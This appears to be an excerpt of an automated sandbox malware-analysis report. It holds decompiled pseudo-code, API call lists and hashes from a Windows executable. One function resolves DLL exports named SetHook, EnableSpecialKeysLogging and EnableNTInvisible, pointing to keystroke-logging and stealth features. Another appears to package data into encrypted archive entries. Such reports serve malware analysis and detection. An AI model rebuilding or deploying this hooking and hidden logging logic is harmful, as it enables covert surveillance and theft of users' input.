    					 *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x44)) + 0x70))(_t152,  *((intOrPtr*)(_t152 - 8)), _t244 - 0x54, 0x26, GetSysColor(0x10));
    					_push( *(_t244 - 0x30));
    					L0043E108();
    					_t124 =  *(_t244 - 0x34);
    					if(_t124 != 0) {
    						_t124 =  *(_t124 + 4);
    					}
    					_push(_t124);
    					_push( *((intOrPtr*)(_t244 - 0x40)));
    					L0043DD84();
    					 *(_t244 - 4) =  *(_t244 - 4) & 0x00000000;
    					L0043DFF4();
    					 *(_t244 - 4) =  *(_t244 - 4) | 0xffffffff;
    					L0043E102();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t244 - 0xc));
    				return _t124;
    			}

    0x0040e430
    0x0040e435
    0x0040e439
    0x0040e43b
    0x0040e442
    0x0040e451
    0x0040e45d
    0x0040e460
    0x0040e463
    0x0040e46a
    0x0040e46d
    0x0040e472
    0x0040e479
    0x0040e484
    0x0040e48a
    0x0040e499
    0x0040e49d
    0x0040e4a2
    0x0040e4a7
    0x0040e4b4
    0x0040e4ba
    0x0040e4bd
    0x0040e4c4
    0x0040e4c6
    0x0040e4c6
    0x0040e4c9
    0x0040e4ca
    0x0040e4cd
    0x0040e4da
    0x0040e4dd
    0x0040e4e2
    0x0040e4e9
    0x0040e4f5
    0x0040e4f8
    0x0040e4fb
    0x0040e505
    0x0040e506
    0x0040e507
    0x0040e50b
    0x0040e517
    0x0040e518
    0x0040e51a
    0x0040e51d
    0x0040e520
    0x0040e523
    0x0040e525
    0x0040e525
    0x0040e528
    0x0040e52e
    0x0040e533
    0x0040e536
    0x0040e537
    0x0040e538
    0x0040e53b
    0x0040e53c
    0x0040e541
    0x0040e544
    0x0040e54a
    0x0040e551
    0x0040e554
    0x0040e558
    0x0040e55b
    0x0040e563
    0x0040e563
    0x0040e56c
    0x0040e57a
    0x0040e58a
    0x0040e59a
    0x0040e59d
    0x0040e5ab
    0x0040e5b0
    0x0040e5b1
    0x0040e5b4
    0x0040e5b7
    0x0040e5b9
    0x0040e5ba
    0x0040e5bb
    0x0040e5c0
    0x0040e5c6
    0x00000000
    0x00000000
    0x0040e560
    0x0040e560
    0x0040e5c8
    0x0040e5c8
    0x0040e5ca
    0x0040e5ce
    0x0040e5d1
    0x0040e5d4
    0x0040e5d5
    0x0040e5d6
    0x0040e5d7
    0x0040e5dc
    0x0040e5e2
    0x0040e5e7
    0x0040e604
    0x0040e60a
    0x0040e60d
    0x0040e60d
    0x0040e616
    0x0040e61b
    0x0040e624
    0x0040e627
    0x0040e634
    0x0040e63f
    0x0040e640
    0x0040e641
    0x0040e64a
    0x0040e64b
    0x0040e657
    0x0040e658
    0x0040e659
    0x0040e65a
    0x0040e65b
    0x0040e664
    0x0040e672
    0x0040e67d
    0x0040e682
    0x0040e696
    0x0040e699
    0x0040e69f
    0x0040e6a4
    0x0040e6ab
    0x0040e6ad
    0x0040e6ad
    0x0040e6b0
    0x0040e6b1
    0x0040e6b4
    0x0040e6b9
    0x0040e6c0
    0x0040e6c5
    0x0040e6cf
    0x0040e6cf
    0x0040e6d8
    0x0040e6e0

    APIs
    • __EH_prolog.LIBCMT ref: 0040E430
    • GetClientRect.USER32 ref: 0040E451
    • #562.MFC42 ref: 0040E46D
    • #323.MFC42 ref: 0040E479
    • CreateCompatibleDC.GDI32(?), ref: 0040E493
    • #1640.MFC42(00000000), ref: 0040E49D
    • #2414.MFC42(00000000), ref: 0040E4A7
    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040E4B4
    • #1641.MFC42(00000000), ref: 0040E4BD
    • #5785.MFC42(?,?,00000000), ref: 0040E4CD
    • GetSysColor.USER32(0000000F), ref: 0040E4DD
      • Part of subcall function 0040E6E1: __EH_prolog.LIBCMT ref: 0040E6E6
      • Part of subcall function 0040E6E1: #283.MFC42(?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E6F5
      • Part of subcall function 0040E6E1: #5788.MFC42(?,?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E707
      • Part of subcall function 0040E6E1: PatBlt.GDI32(00000000,?,?,?,?,00F00021), ref: 0040E722
      • Part of subcall function 0040E6E1: #5788.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E72B
      • Part of subcall function 0040E6E1: #2414.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E741
    • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000030,?), ref: 0040E604
    • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E60D
    • #5788.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E616
    • #5875.MFC42(00000001,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E627
    • GetSysColor.USER32(00000014), ref: 0040E62E
    • #6172.MFC42(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E634
    • OffsetRect.USER32(?,00000001,00000001), ref: 0040E64B
    • GetSysColor.USER32(00000010), ref: 0040E677
    • #6172.MFC42(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E67D
    • #5788.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E69F
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E6B4
    • #640.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E6C0
    • #816.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E6CF
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5788$ColorCreate$#1641#2414#5785#6172CompatibleH_prologRect$#1640#283#323#562#5875#640#816BitmapClientFontOffset
    • String ID:
    • API String ID: 488967498-0
    • Opcode ID: b89e63d6abeafeb36743849c66ca51e738dd1c4487331a27789d3df08a7090f3
    • Instruction ID: 00b987ec6506c25ccf08960c55b572c892d5960c241a1689b0548be05c3f8ba0
    • Opcode Fuzzy Hash: b89e63d6abeafeb36743849c66ca51e738dd1c4487331a27789d3df08a7090f3
    • Instruction Fuzzy Hash: 2E916972D001199FCF14DFEACD85AEEBBB9EF48304F10446AE501B7291DA756E05CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00421274(void* __ecx, void* __eflags) {
    				struct HINSTANCE__* _t28;
    				_Unknown_base(*)()* _t29;
    				_Unknown_base(*)()* _t30;
    				_Unknown_base(*)()* _t31;
    				_Unknown_base(*)()* _t32;
    				_Unknown_base(*)()* _t33;
    				_Unknown_base(*)()* _t34;
    				_Unknown_base(*)()* _t35;
    				intOrPtr* _t39;
    				signed int _t42;
    				void* _t50;
    				intOrPtr* _t51;
    				void* _t56;
    				void* _t64;
    
    				E0043E4E0(0x442134, _t56);
    				_t42 = 0;
    				_t50 = __ecx;
    				E0042A660(_t56 - 0x110, 2, 0);
    				if( *((intOrPtr*)(_t56 + 8)) == 0) {
    					_t51 =  *((intOrPtr*)(__ecx + 0x2750));
    					if(_t51 != 0) {
    						 *_t51(0, 0, 0);
    					}
    					L18:
    					_push(1);
    					_pop(0);
    					L19:
    					 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
    					return 0;
    				}
    				_t64 =  *0x455ac0 - _t42; // 0x10000000
    				if(_t64 != 0) {
    					goto L18;
    				}
    				_t28 = LoadLibraryA(_t56 - 0x110);
    				 *0x455ac0 = _t28;
    				if(_t28 == 0) {
    					L15:
    					goto L19;
    				}
    				_t29 = GetProcAddress(_t28, "SetHook");
    				 *(_t50 + 0x2750) = _t29;
    				if(_t29 == 0) {
    					goto L15;
    				}
    				_t30 = GetProcAddress( *0x455ac0, "EnableSpecialKeysLogging");
    				 *(_t50 + 0x2760) = _t30;
    				if(_t30 == 0) {
    					goto L15;
    				}
    				_t31 = GetProcAddress( *0x455ac0, "DLL_GetProjectVersion");
    				 *(_t50 + 0x2754) = _t31;
    				if(_t31 == 0) {
    					goto L15;
    				}
    				_t32 = GetProcAddress( *0x455ac0, "EnablePreHandle");
    				 *(_t50 + 0x2758) = _t32;
    				if(_t32 == 0) {
    					goto L15;
    				}
    				_t33 = GetProcAddress( *0x455ac0, "EnableNTInvisible");
    				 *(_t50 + 0x2768) = _t33;
    				if(_t33 == 0) {
    					goto L15;
    				}
    				_t34 = GetProcAddress( *0x455ac0, "EnableDiaryTracking");
    				 *(_t50 + 0x84) = _t34;
    				if(_t34 == 0) {
    					goto L15;
    				}
    				_t35 = GetProcAddress( *0x455ac0, "EnableAltInterception");
    				 *(_t50 + 0x275c) = _t35;
    				if(_t35 == 0) {
    					goto L15;
    				}
    				if( *(_t50 + 0x2754)() == 0xc9) {
    					if(_t50 != 0) {
    						_t42 =  *((intOrPtr*)(_t50 + 0x20));
    					}
    					_push(_t42);
    					_push( *0x455ac0);
    					_push(1);
    					if( *(_t50 + 0x2750)() != 0) {
    						goto L18;
    					} else {
    						goto L15;
    					}
    				}
    				_t39 = E00429029(_t56 + 8, 0xe044);
    				_push(0);
    				_push(0x10);
    				_push( *_t39);
    				 *(_t56 - 4) = 0;
    				L0043E16E();
    				 *(_t56 - 4) =  *(_t56 - 4) | 0xffffffff;
    				L0043DD36();
    				goto L15;
    			}

    0x00421279
    0x00421286
    0x00421292
    0x00421295
    0x004212a0
    0x004213d9
    0x004213e1
    0x004213e6
    0x004213e6
    0x004213e8
    0x004213e8
    0x004213ea
    0x004213eb
    0x004213f1
    0x004213f9
    0x004213f9
    0x004212a6
    0x004212ac
    0x00000000
    0x00000000
    0x004212b9
    0x004212c1
    0x004212c6
    0x004213d5
    0x00000000
    0x004213d5
    0x004212d8
    0x004212dc
    0x004212e2
    0x00000000
    0x00000000
    0x004212f3
    0x004212f7
    0x004212fd
    0x00000000
    0x00000000
    0x0042130e
    0x00421312
    0x00421318
    0x00000000
    0x00000000
    0x00421329
    0x0042132d
    0x00421333
    0x00000000
    0x00000000
    0x00421344
    0x00421348
    0x0042134e
    0x00000000
    0x00000000
    0x0042135f
    0x00421363
    0x00421369
    0x00000000
    0x00000000
    0x00421376
    0x0042137a
    0x00421380
    0x00000000
    0x00000000
    0x0042138d
    0x004213bd
    0x004213bf
    0x004213bf
    0x004213c2
    0x004213c3
    0x004213c9
    0x004213d3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004213d3
    0x00421398
    0x004213a1
    0x004213a2
    0x004213a4
    0x004213a5
    0x004213a8
    0x004213ad
    0x004213b4
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 00421279
      • Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
      • Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0
    • LoadLibraryA.KERNEL32(?,00000000,?,00000000), ref: 004212B9
    • GetProcAddress.KERNEL32(00000000,SetHook), ref: 004212D8
    • GetProcAddress.KERNEL32(EnableSpecialKeysLogging), ref: 004212F3
    • GetProcAddress.KERNEL32(DLL_GetProjectVersion), ref: 0042130E
    • GetProcAddress.KERNEL32(EnablePreHandle), ref: 00421329
    • GetProcAddress.KERNEL32(EnableNTInvisible), ref: 00421344
    • GetProcAddress.KERNEL32(EnableDiaryTracking), ref: 0042135F
    • GetProcAddress.KERNEL32(EnableAltInterception), ref: 00421376
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #1200.MFC42(?,00000010,00000000,?,00000000), ref: 004213A8
    • #800.MFC42(?,00000010,00000000,?,00000000), ref: 004213B4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$Loadlstrlen$#1168#1200#537#800FileH_prologLibraryModuleNameStringlstrcat
    • String ID: 4!D$DLL_GetProjectVersion$EnableAltInterception$EnableDiaryTracking$EnableNTInvisible$EnablePreHandle$EnableSpecialKeysLogging$SetHook
    • API String ID: 1914841584-874115391
    • Opcode ID: 5f324d8e9e07d7d23e767c23ccbe8ac709c079e985301b7483cab48d8b03b106
    • Instruction ID: bc6f9c26e2b2dca5dba9f5e875722a2fec720e5f9551365c77f5d9aac5bb0a88
    • Opcode Fuzzy Hash: 5f324d8e9e07d7d23e767c23ccbe8ac709c079e985301b7483cab48d8b03b106
    • Instruction Fuzzy Hash: 29311271B00B25ABD710CF61ECC5A6AB6B5FB58305F94053BF509D29A1DBB8AC808F58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00418010(intOrPtr* __ecx, void* __edx, char* _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a19) {
    				void* _v8;
    				char _v12;
    				char _v13;
    				char _v14;
    				char _v15;
    				char _v16;
    				char _v17;
    				char _v18;
    				char _v19;
    				char _v20;
    				char _v21;
    				char _v22;
    				char _v23;
    				char _v24;
    				signed char _v25;
    				char _v26;
    				char _v27;
    				char _v28;
    				signed char _v32;
    				char _v33;
    				char _v44;
    				void _v56;
    				signed char _v60;
    				signed char _v64;
    				intOrPtr _v72;
    				char _v332;
    				char _v592;
    				signed char _v596;
    				void* _v600;
    				char* _v604;
    				char _v864;
    				intOrPtr _v868;
    				intOrPtr _v872;
    				short _v876;
    				short _v878;
    				signed short _v880;
    				signed char _v884;
    				int _v888;
    				intOrPtr _v892;
    				int _v896;
    				intOrPtr _v900;
    				signed char _v904;
    				signed char _v908;
    				unsigned int _v912;
    				short _v914;
    				signed int _v916;
    				short _v918;
    				void _v920;
    				char _v1180;
    				void* __edi;
    				void* _t186;
    				int _t193;
    				short _t198;
    				char _t207;
    				char _t209;
    				char _t214;
    				char _t216;
    				char _t218;
    				char _t221;
    				char _t223;
    				void* _t231;
    				intOrPtr _t232;
    				char _t240;
    				signed char _t241;
    				intOrPtr _t245;
    				void* _t251;
    				void* _t254;
    				signed int _t267;
    				intOrPtr _t269;
    				intOrPtr _t274;
    				intOrPtr _t285;
    				intOrPtr* _t286;
    				void* _t287;
    				signed int _t288;
    				void* _t289;
    				void* _t296;
    				void* _t297;
    				void* _t298;
    				void* _t299;
    				void* _t300;
    				void* _t301;
    				void* _t302;
    				void* _t303;
    				void* _t304;
    				int _t305;
    				signed int _t309;
    				signed int _t310;
    				void* _t311;
    				void* _t329;
    				intOrPtr _t340;
    				intOrPtr* _t345;
    				void* _t346;
    				char* _t347;
    				short _t348;
    				void* _t349;
    				intOrPtr* _t353;
    				void* _t354;
    				void* _t355;
    				void* _t356;
    				void* _t357;
    
    				_t329 = __edx;
    				_t353 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
    					return 0x40000;
    				}
    				if( *((char*)(__ecx + 0x2c)) != 0) {
    					return 0x50000;
    				}
    				_t340 = _a16;
    				_v32 = 0;
    				if( *__ecx != 0 && _t340 != 4) {
    					_v32 = 0xc;
    				}
    				strcpy( &_v1180, _a4);
    				if(_v1180 == 0) {
    					L89:
    					return 0x10000;
    				}
    				_t185 =  &_v1180;
    				do {
    					if( *_t185 == 0x5c) {
    						 *_t185 = 0x2f;
    					}
    					_t185 = _t185 + 1;
    				} while ( *_t185 != 0);
    				_a19 = _t340 == 4;
    				if(_a19 == 0 ||  *((char*)(_t354 + strlen( &_v1180) - 0x499)) == 0x2f) {
    					_a7 = _a7 & 0x00000000;
    				} else {
    					_a7 = 1;
    				}
    				_v8 = 8;
    				if(_a19 != 0) {
    					L18:
    					_v8 = 0;
    				} else {
    					_push( &_v1180);
    					if(L0041753B( &_v1180, _t329, _t340) != 0) {
    						goto L18;
    					}
    				}
    				if(_t340 != 2) {
    					if(_t340 != 1) {
    						if(_t340 != 3) {
    							if(_t340 != 4) {
    								goto L89;
    							}
    							_t186 = L00417D49(_t185, _t329, _t340);
    						} else {
    							_push(_a12);
    							_push(_a8);
    							_t186 = L00417C8D(_t185, _t329, _t340);
    						}
    					} else {
    						_push(_a12);
    						_push(_a8);
    						_t186 = L00417B75(_t185, _t329, _t340);
    					}
    				} else {
    					_push(_a8);
    					_t186 = L00417AF4(_t185, _t329, _t340);
    				}
    				if(_t186 == 0) {
    					_v60 = 0;
    					strcpy( &_v864, 0x4550cc);
    					strcpy( &_v592,  &_v1180);
    					_t193 = strlen( &_v592);
    					_t356 = _t355 + 0x14;
    					_v896 = _t193;
    					if(_a7 != 0) {
    						strcat( &_v592, "/");
    						_v896 = _v896 + 1;
    					}
    					strcpy( &_v332, 0x4550cc);
    					_v596 = 0;
    					_v884 = 0;
    					_v72 = 1;
    					_v64 = 0;
    					_v878 = 0;
    					_v920 = 0xb17;
    					_v918 = 0x14;
    					_v912 =  *((intOrPtr*)(_t353 + 0x68));
    					_v908 = 0;
    					_v916 = 8;
    					if( *_t353 != 0 && _a19 == 0) {
    						_v916 = 9;
    					}
    					_v876 = _v916;
    					_t198 = _v8;
    					_v914 = _t198;
    					if(_t198 != 0) {
    						L36:
    						_v904 = 0;
    					} else {
    						_t274 =  *((intOrPtr*)(_t353 + 0x70));
    						if(_t274 < 0) {
    							goto L36;
    						} else {
    							_v904 = _t274 + _v32;
    						}
    					}
    					_v900 =  *((intOrPtr*)(_t353 + 0x70));
    					_v872 =  *((intOrPtr*)(_t353 + 0x4c));
    					_v880 = _v880 & 0x00000000;
    					_v25 = _v25 & 0x00000000;
    					_v868 =  *((intOrPtr*)(_t353 + 0x18)) +  *((intOrPtr*)(_t353 + 0x10));
    					_v604 =  &_v28;
    					_v600 =  &_v56;
    					_v23 =  *((intOrPtr*)(_t353 + 0x58));
    					_t296 = 8;
    					_v892 = 0x11;
    					_v888 = 9;
    					_v28 = 0x55;
    					_v27 = 0x54;
    					_v26 = 0xd;
    					_v24 = 7;
    					_t207 = E0043E780( *((intOrPtr*)(_t353 + 0x58)), _t296,  *((intOrPtr*)(_t353 + 0x5c)));
    					_v22 = _t207;
    					_t297 = 0x10;
    					_t209 = E0043E780( *((intOrPtr*)(_t353 + 0x58)), _t297,  *((intOrPtr*)(_t353 + 0x5c)));
    					_v21 = _t209;
    					_t298 = 0x18;
    					_v20 = E0043E780( *((intOrPtr*)(_t353 + 0x58)), _t298,  *((intOrPtr*)(_t353 + 0x5c)));
    					_v19 =  *((intOrPtr*)(_t353 + 0x50));
    					_t299 = 8;
    					_t214 = E0043E780( *((intOrPtr*)(_t353 + 0x50)), _t299,  *((intOrPtr*)(_t353 + 0x54)));
    					_v18 = _t214;
    					_t300 = 0x10;
    					_t216 = E0043E780( *((intOrPtr*)(_t353 + 0x50)), _t300,  *((intOrPtr*)(_t353 + 0x54)));
    					_v17 = _t216;
    					_t301 = 0x18;
    					_t218 = E0043E780( *((intOrPtr*)(_t353 + 0x50)), _t301,  *((intOrPtr*)(_t353 + 0x54)));
    					_t344 =  *((intOrPtr*)(_t353 + 0x60));
    					_t285 =  *((intOrPtr*)(_t353 + 0x64));
    					_v16 = _t218;
    					_v15 =  *((intOrPtr*)(_t353 + 0x60));
    					_t302 = 8;
    					_t221 = E0043E780( *((intOrPtr*)(_t353 + 0x60)), _t302, _t285);
    					_v14 = _t221;
    					_t303 = 0x10;
    					_t223 = E0043E780( *((intOrPtr*)(_t353 + 0x60)), _t303, _t285);
    					_v13 = _t223;
    					_t304 = 0x18;
    					_t338 = _t285;
    					_v12 = E0043E780( *((intOrPtr*)(_t353 + 0x60)), _t304, _t285);
    					_t101 =  &_v28; // 0x55
    					memcpy( &_v56, _t101, 9);
    					_push(_t353);
    					_push(L00417957);
    					 *((char*)(_v600 + 2)) = 5;
    					_push( &_v920);
    					_t231 = L00416B45( &_v920, _t285,  *((intOrPtr*)(_t353 + 0x60)));
    					_t357 = _t356 + 0x18;
    					if(_t231 != 0) {
    						L00417E95(_t231, _t338, _t344);
    						L80:
    						return 0x400;
    					}
    					_t232 = _v892;
    					_t305 = _v896;
    					_t233 = _t232 + _t305 + 0x1e;
    					 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + _t232 + _t305 + 0x1e;
    					if( *(_t353 + 0x14) != 0) {
    						L00417E95(_t233, _t338, _t344);
    						return  *(_t353 + 0x14);
    					}
    					_t345 =  *_t353;
    					_t286 = _t353 + 0x30;
    					 *_t286 = 0x12345678;
    					 *((intOrPtr*)(_t353 + 0x34)) = 0x23456789;
    					 *((intOrPtr*)(_t353 + 0x38)) = 0x34567890;
    					if(_t345 != 0) {
    						while(1) {
    							_t269 =  *_t345;
    							if(_t269 == 0) {
    								goto L44;
    							}
    							_push(_t269);
    							_push(_t286);
    							L004174A8(_t269, _t338, _t345);
    							_t345 = _t345 + 1;
    							if(_t345 != 0) {
    								continue;
    							}
    							goto L44;
    						}
    					}
    					L44:
    					if( *0x4553e0 == 0) {
    						_t267 = GetDesktopWindow();
    						srand(_t267 ^ GetTickCount());
    					}
    					_t346 = 0;
    					do {
    						 *((char*)(_t354 + _t346 - 0x28)) = rand() >> 7;
    						_t346 = _t346 + 1;
    					} while (_t346 < 0xc);
    					_v33 = _v912 >> 8;
    					_t287 = 0;
    					do {
    						_t347 = _t354 + _t287 - 0x28;
    						_push( *((intOrPtr*)(_t354 + _t287 - 0x28)));
    						_push(_t353 + 0x30);
    						_t240 = L00417516(_t353 + 0x30, _t338, _t347);
    						_t287 = _t287 + 1;
    						 *_t347 = _t240;
    					} while (_t287 < 0xc);
    					_t288 = 0;
    					if( *_t353 == 0) {
    						L56:
    						_t241 = 0;
    					} else {
    						if(_a19 == 0) {
    							_push(0xc);
    							_push( &_v44);
    							_push(_t353);
    							L00417957( &_v44, _t338, _t347);
    							_t357 = _t357 + 0xc;
    							 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + 0xc;
    						}
    						if( *_t353 == _t288 || _a19 != 0) {
    							goto L56;
    						} else {
    							_t241 = 1;
    						}
    					}
    					 *(_t353 + 0x2d) = _t241;
    					if(_a19 != 0) {
    						_t348 = _v8;
    						 *(_t353 + 0x90) = _t288;
    					} else {
    						_t348 = _v8;
    						if(_t348 != 8) {
    							if(_t348 == 0) {
    								_t241 = L00417FB9(_t241, _t338, _t348);
    								goto L60;
    							}
    						} else {
    							_push( &_v920);
    							_t241 = L00417ED7( &_v920, _t338, _t348);
    							L60:
    							_t288 = _t241;
    						}
    					}
    					 *(_t353 + 0x2d) =  *(_t353 + 0x2d) & 0x00000000;
    					L00417E95(_t241, _t338, _t348);
    					_t309 =  *(_t353 + 0x90);
    					_t186 =  *(_t353 + 0x14);
    					 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + _t309;
    					if(_t186 == 0) {
    						if(_t288 != 0) {
    							goto L80;
    						}
    						_t339 =  *((intOrPtr*)(_t353 + 0x78));
    						_t245 = _v32 + _t309;
    						_v908 =  *((intOrPtr*)(_t353 + 0x78));
    						_v904 = _t245;
    						_t310 = _t309 & 0xffffff00 | _v904 == _t245;
    						_v900 =  *((intOrPtr*)(_t353 + 0x70));
    						if( *((intOrPtr*)(_t353 + 0x1c)) == _t288 ||  *_t353 != _t288 && _a19 == _t288) {
    							if(_v914 != _t348 || _t348 == 0 && _t310 == 0) {
    								return 0x4000000;
    							}
    							_push(_t353);
    							_push(L00417957);
    							_push( &_v920);
    							if(L00416D87( &_v920, _t339, _t348) != 0) {
    								goto L80;
    							}
    							 *((intOrPtr*)(_t353 + 0x18)) =  *((intOrPtr*)(_t353 + 0x18)) + 0x10;
    							_v916 = _v876;
    						} else {
    							_v914 = _t348;
    							if((_v916 & 0x00000001) == 0) {
    								_v916 = _v916 & 0x0000fff7;
    							}
    							_v876 = _v916;
    							_push(_v868 -  *((intOrPtr*)(_t353 + 0x10)));
    							if(L00417A41(_v868 -  *((intOrPtr*)(_t353 + 0x10)), _t339, _t348) == 0) {
    								L74:
    								return 0x2000000;
    							}
    							_push(_t353);
    							_push(L00417957);
    							_push( &_v920);
    							if(L00416B45( &_v920, _t339, _t348) != 0) {
    								goto L80;
    							}
    							_push( *((intOrPtr*)(_t353 + 0x18)));
    							if(L00417A41(_t262, _t339, _t348) == 0) {
    								goto L74;
    							}
    						}
    						_t186 =  *(_t353 + 0x14);
    						if(_t186 == 0) {
    							_push(_v888);
    							L0043DD54();
    							_t349 = _t186;
    							_t251 = memcpy(_t349, _v600, _v888);
    							_v600 = _t349;
    							_push(0x360);
    							L0043DD54();
    							_t289 = _t251;
    							memcpy(_t289,  &_v920, 0x360);
    							_t254 =  *(_t353 + 0x44);
    							if(_t254 != 0) {
    								while(1) {
    									_t311 =  *(_t254 + 0x35c);
    									if(_t311 == 0) {
    										break;
    									}
    									_t254 = _t311;
    								}
    								 *(_t254 + 0x35c) = _t289;
    								L88:
    								return 0;
    							}
    							 *(_t353 + 0x44) = _t289;
    							goto L88;
    						}
    					}
    				}
    				return _t186;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
